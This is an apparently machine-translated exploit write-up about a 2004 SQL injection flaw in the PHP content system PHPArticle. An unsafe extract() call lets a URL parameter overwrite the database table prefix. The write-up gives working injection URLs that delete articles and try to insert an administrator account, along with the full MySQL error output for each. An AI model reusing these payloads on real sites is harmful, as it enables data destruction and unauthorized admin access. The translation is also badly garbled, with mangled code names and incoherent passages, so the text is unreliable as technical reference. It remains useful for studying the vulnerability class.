PHPArticle is the best article system in PHP. It seems that it has not been black records so far. I used to learn PHP. I saw this article system code, I feel similar to VBB, and also carefully analyze, there is no loophole, Later, after the PHP was grasped, I didn't go to analyze him. It is very safe to give me.
Some time, small flowers and I said that phparticle has a variable without initialization. I have seen it. I can't construct this variable, and any page can be, harmful, I have no ability to get a meaningful thing, but it is easy to destroy simply Hey, finally understands that the damage is simpler than the construction.
The beginning of the /Global.php file is written like this:
/admin/configs/setting.php file, Variable $ Configuration is an array, which is the configuration parameters of the entire article system. In order to reduce the number of queries, put the database configuration information, the speed is natural, this original is very Normal is normal, but a line of code, it is enough to make PHParticle's data to disappear instantly.
Extract ($ Configuration, Extr_OverWrite);
The EXTRACT () function is written on the PHP manual:
Int extract (Array Var_Array [, int extract_type [, string prefix]])
This function is used to import variables into the current symbol table from an array. Accept the value of the array var_array as a parameter and use the key name as a variable name, value as the value of the variable. Variables are established in the current symbol table for each key / value pair and is affected by the extract_type and prefix parameters.
Note: From version 4.0.5, the number of variables extracted is returned.
Note: EXTR_IF_EXISTS and EXTR_PREFIX_IF_EXISTS are introduced in version 4.2.0.
Note: EXTR_REFS is introduced in version 4.3.0.
Extract () checks if each key name can be used as a legitimate variable name, and also checks the conflicts of the existing variable names in the symbol table. The method of the key name to be illegally / numbers and conflicts will be determined according to the extract_type parameter. Can be one of the following values:
EXTR_OVERWRITE covers existing variables if there is a conflict.
Obviously, here can cover any variables, even system variables, including $ _get, $ _ post, etc. I really don't understand why the author wants to comment on this "extr_overwrite".
The most critical variable is a $ db_prefix variable under Admin / Config.php, which is a table prefix. This is the most useful, because all queries in phparticle use this variable on the surface, must cause SQL injection, but the conditions are extremely harsh . The prefix from the table constructs a complete SQL Query. Then comment on the following statement. Oh, maybe you can still load_file or into outfile, happiness ~~ But actually not so smooth, for clearer testing. I set a variable $ SQL for all SQL Query, then output to the system's home page, what is the first SQL statement is what is the SELECT, which can be injected, which can get a lot of useful information. Even ... If INSERT is better, the direct construct statement inserts an administrator. It is UPDATE, and the user Update I registered into the role of the administrator group. It is delete, you can delete any data, the result is output The statement is "Delete from Pa_Session WHERE Expiry <1103398532 11111111", as shown:
Very annoying, if this delete statement is wrong, the mysql error message is displayed, and the running program is stopped, it is impossible to perform the next SQL statement, annoying. And PHParticle's fault tolerance is very good. There is no way to return to the physical path of the Web. If the current user is not an administrator, even the mysql error message can be seen, I have tested locally because it is an administrator, so Mysql's error information is returned to the screen, and test it on us. More helpful, let's construct a complete DELETE statement to see, after success, you should continue to perform the next SQL Query, I will submit:
Http://localhost/phparticle/global.php? configure [db_prefix] = angel
The result is returned:
PHPArticle ------------------------------------------------- ------------------------------ Database error: SQL invalid: delete from angelsession where expression <1104152890mysql error Description: Table 'Article20 .angelsession 'doesn't exist mySQL Error Number: 1146 Date: 2004-12-27 @ 21:08 script: http://localhost/phparticle/global.php? configuration [db_prefix] = angel referer: Please try to refresh you Browser, if you still have no normal display, please contact the administrator.
The wrong, the table does not exist, but the database name has already come, it is article20. Of course, the actual application is not seeing this information, because phparticle has a relatively complete session check, so no matter whether you browse or refresh any page, you will first Session table operation, delete the user's session, update session, query session, will have actions, because the user logs in, online users, and the user's status, all use session records, after understanding these, start constructing a complete DELETE statement Let's take a look at the next step: http://localhost/phparticle/global.php? Configuration [db_prefix] = PA_Article where articles = 1 / *
return:
PHPArticle ------------------------------------------------- ------------------------------- Database error: SQL invalid: SELECT Count (Distinct ipaddress) As Total from PA_Article Where ArticleID = 1 / * session WHERE expiry> 1104153004Mysql error description: Unknown column 'ipaddress' in 'field list' Mysql error number: 1054 Date: 2004-12-27 @ 21:10 Script: http: //localhost/phparticle/global.php • Configuration [db_prefix] = pa_article% 20where% 20ArticleID = 1 / * Referr: Try to refresh your browser, if it still does not display properly, please contact the administrator. PHParticle ------------- -------------------------------------------------- ----------------- Database error: SQL invalid: INSERT INTO PA_Article Where ArticleId = 1 / * session (sessionid, expiry, value, userid, ipaddress, usrage, location, lastact) VALUES ('A9FDC1B9D7E37B92686FB46486B41D20', 1104154444, 'Pauserinfo | A: 1: {s: 14: / "timezoneoffset /"; s: 1: / "8 /";}', ',' 127.0.0.1 ',' mozilla / 4.0 (Compatible; Msie 6.0; Windows NT 5.2; Maxthon; .NET CLR 1.1.4322) ',' / phparticle / global.php? Configuration [db_prefix] = pa_article% 20where% 20ArticleID = 1 / * ',' 1104153004 ') Mysql error description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near' where articleid = 1 / * session (sessionid, expiry, value, userid, ipaddr mysql error Number: 1064 Date: 2004-12-27 @ 21:10 script: http://localhost/phparticle/global.php? configuration [db_prefix] = pa_article% 20where% 20ArticleID = 1 / * Referr: Please try to refresh Your browser, if you still have no normal display, please contact the administrator. Warning: unknown (): a session is active. You Cannot Change The Session Module's INI Settings At this time. In unknown on line 0
Take a look at the article system. The article has been successfully deleted. But SQL Query is stayed on the SELECT, and the error message has terminated the running of the program, causing the next SQL Query, but from the error page, the Insert statement is also executed with our parameters, as shown: Click View original size picture
I want to directly construct the INSERT statement to add an administrator?
http://localhost/phparticle/global.php? Configuration [db_prefix] = Pa_user Values (Null, CHAR (110, 97, 109, 101), 1, CHAR (102, 52, 102, 48, 54, 56, 101 , 55, 49, 101, 48, 100, 56, 55, 98, 102, 48, 97, 100, 53, 49, 101, 54, 50, 49, 52, 97, 98, 56, 52, 101, 57 ), 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 8); / *
The result is returned, it seems that the line is not true, when the first sentence SQL Query, the error is terminated.
PHPArticle ------------------------------------------------- ------------------------------ Database error: SQL invalid: delete from PA_USER VALUES (NULL, CHAR (110, 97, 109, 101), 1, CHAR (102, 52, 102, 48, 54, 56, 101, 55, 49, 101, 48, 06, 55, 98, 102, 48, 97, 100, 53, 49 101, 54, 50, 49, 52, 97, 57), 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 8); / * session WHERE expiry <1104153372Mysql error description: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'VALUES (null, char (110, 97, 109, 101), 1, 25, 56, 101 MySQL Error Number: 1064 Date: 2004-12-27 @ 21:16 script: http: // localhost / phparticle / GLOBAL.PHP? Configuration [db_prefix] = pa_user% 20values% 20 (NULL, CHAR (110, 97, 109, 101), 1, CHAR (102, 52, 102, 48, 54, 56, 101, 55, 49, 101, 48, 100, 56, 55, 98, 102, 48, 97, 100, 53, 49, 101, 54, 50, 49, 52, 97, 98, 56, 52, 101, 57), 1, 1 , 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 8); / * REFERE R: Please try to refresh your browser, if you still have no normal display, please contact the administrator.
In this point, I can only submit helplessly:
http://localhost/phparticle/global.php? configure [db_prefix] = pa_article / *
End this test.
